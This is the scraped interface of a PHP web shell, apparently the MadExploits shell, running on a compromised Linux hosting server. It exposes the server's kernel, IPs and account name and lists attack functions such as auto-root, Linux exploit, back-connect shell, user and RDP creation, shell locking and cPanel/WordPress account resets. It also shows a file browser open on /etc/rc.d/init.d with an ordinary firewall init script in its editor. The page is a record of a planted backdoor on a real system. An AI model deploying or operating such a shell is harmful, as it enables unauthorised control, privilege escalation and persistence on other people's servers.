Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.16.203.9
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
rc.d /
init.d /
[ HOME SHELL ]
Name
Size
Permission
Action
README
1.13
KB
-rw-r--r--
firewall
783
B
-rwxr-xr-x
functions
17.85
KB
-rw-r--r--
netconsole
4.46
KB
-rwxr-xr-x
network
7.74
KB
-rwxr-xr-x
sys-snap
2.36
KB
-rwx------
Delete
Unzip
Zip
${this.title}
Close
Code Editor : firewall
#!/bin/sh # description: Start/stop Firewall # chkconfig: 2345 99 99 if [[ -e /etc/csf/version.txt ]]; then echo "CSF Detected... Exiting..." exit 1 elif [[ -d /etc/apf ]]; then echo "APF Detected... Exiting..." exit 1 elif [[ -e /usr/sbin/firewalld ]]; then echo "Firewalld detected... Exiting..." exit 1 fi case "$1" in 'start') modprobe ip_conntrack_ftp bash /usr/sbin/firewall start service iptables save 2>&1 RETVAL=$? ;; 'stop') iptables -F iptables -X bash /usr/sbin/firewall stop RETVAL=$? ;; 'restart') iptables -F iptables -X modprobe ip_conntrack_ftp bash /usr/sbin/firewall stop bash /usr/sbin/firewall start service iptables save 2>&1 RETVAL=$? ;; *) echo "Usage: $0 { start | stop | restart }" RETVAL=1 ;; esac exit $RETVAL
Close